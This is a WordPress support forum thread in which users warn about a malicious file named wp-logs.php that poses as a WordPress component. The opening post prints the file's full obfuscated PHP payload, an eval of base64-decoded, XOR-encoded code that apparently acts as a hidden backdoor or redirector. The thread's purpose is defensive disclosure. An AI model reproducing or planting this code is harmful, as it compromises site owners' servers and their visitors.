• upoopoo

    (@upoopoo)


    This is actually not related to wordpress at all, but since the file is trying to impersonate a component of wordpress I thought I would post here. Basically there is a wp-logs.php script that get’s run. Code looks like this:

    <?eval(base64_decode(“JGs9MTQyOyRtPWV4cGxvZGUoIjsiLCIxNzA7MjM3OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjMxOzIyNDsyMzE7MjUwOzE2NjsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIwMDsyMDc7MTk5OzE5NDsxOTM7MTkyOzIwMzsyMjA7MjIwOzE5MzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMDA7MTkzOzE5NDsxOTQ7MTkzOzIxNzsxOTQ7MTkzOzIwNTsyMDc7MjE4OzE5OTsxOTM7MTkyOzE2MjsxNzQ7MjUwOzI1MjsyNTE7MjM1OzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjAzOzE5MjsyMDU7MTkzOzIwMjsxOTk7MTkyOzIwMTsxNzQ7MTYyOzE3NDsxNjk7MjMzOzI0NDsyMzE7MjU0OzE2MjsxNzQ7MjM0OzIzNTsyMzI7MjI2OzIzOTsyNTA7MjM1OzE2OTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMTsyMjE7MTk0OzIwOTsyMTY7MjAzOzIyMDsxOTk7MjAwOzIxNTsyMjI7MjAzOzIwMzsyMjA7MTYyOzE3NDsxOTA7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMTk7MjIxOzIwMzsyMjA7MjA3OzIwMTsyMDM7MTkyOzIxODsxNjI7MTc0OzE3MjsxOTM7MjU0OzIzNTsyNTI7MjM5OzE2MTsxODM7MTYwOzE4NzsxOTE7MTc0OzE2NjsyMTc7MjMxOzIyNDsyMzQ7MjI1OzI0OTsyNTM7MTc0OzE5MjsyMTg7MTc0OzE4NzsxNjA7MTkxOzE4MTsxNzQ7MjE5OzE4MTsxNzQ7MjUxOzI1MzsxNjc7MTcyOzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjE5OzIyMDsxOTQ7MTYyOzE3NDsxNzA7MjA5OzIyMDsyMDM7MjIzOzIxOTsyMDM7MjIxOzIxODsyMTM7MTY5OzIyNTsyMjk7MjI0OzIyNTsyNDk7MTY5OzIxMTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMDsyMDM7MjE4OzIxOTsyMjA7MTkyOzIxODsyMjA7MjA3OzE5MjsyMjE7MjAwOzIwMzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsxNzA7MjI1OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI0NjsyMzU7MjM3OzE2NjsxNzA7MjM3OzE2NzsxODE7MjMxOzIzMjsxNjY7MjM3OzI1MTsyNTI7MjI2OzIwOTsyMzU7MjUyOzI1MjsyMjQ7MjI1OzE2NjsxNzA7MjM3OzE2NzsxNjc7MTc0OzI0NTsxMzU7MjM1OzIzNzsyMzA7MjI1OzE2OTsxNzg7MTc1OzE2MzsxNjM7MTc0OzI1MTsxODk7MjUyOzE4NzsyNDk7MTg1OzIzNTsxNzQ7MTYzOzE2MzsxNzY7MTY5OzE2MDsxNzA7MjI1OzE4MTsyMzU7MjM3OzIzMDsyMjU7MTc0OzE3MjsyMDM7MjUyOzI1MjsyMjU7MjUyOzE3NDsyMjQ7MjUxOzIyNzsyMzY7MjM1OzI1MjsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI0OzIyNTsxNjY7MTcwOzIzNzsxNjc7MTc0OzE2MDsxNzI7MjEwOzIyNDsxNzI7MTgxOzIzNTsyMzc7MjMwOzIyNTsxNzQ7MTcyOzIwMzsyNTI7MjUyOzIyNTsyNTI7MTc0OzIyNzsyMzU7MjUzOzI1MzsyMzk7MjMzOzIzNTsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI1OzI1MjsxNjY7MTcwOzIzNzsxNjc7MTYwOzE3MjsyMTA7MjI0OzE3MjsxODE7MjQzOzE3NDsyMzU7MjI2OzI1MzsyMzU7MTc0OzI0NTsyMzU7MjM3OzIzMDsyMjU7MTY5OzE3ODsxNzU7MTYzOzE2MzsxNzQ7MjUxOzE4ODsyNTI7MTg2OzI0OTsxODQ7MjM1OzE3NDsxNjM7MTYzOzE3NjsxNjk7MTYwOzE3MDsyMjU7MTgxOzI0MzsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7”));?>

    If you find this running on your server, get rid of it. I still haven’t found what was the original exploit that got this on the server in the first place, working on it. Please post here if you have found the source of the exploit or have any additional useful information.

Viewing 2 replies - 1 through 2 (of 2 total)
  • gregmce

    (@gregmce)

    Ah, crap, I found it on one of my sites too. Thanks for the heads up, and any more information would be greatly appreciated!

    Just was told that a logs.php file was running a script on one of my sites. I checked my previous backups and it appears that an index.html was replaced by this. My hosting company suspended my account without an explanation as to what it was.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘wp-logs.php’ is closed to new replies.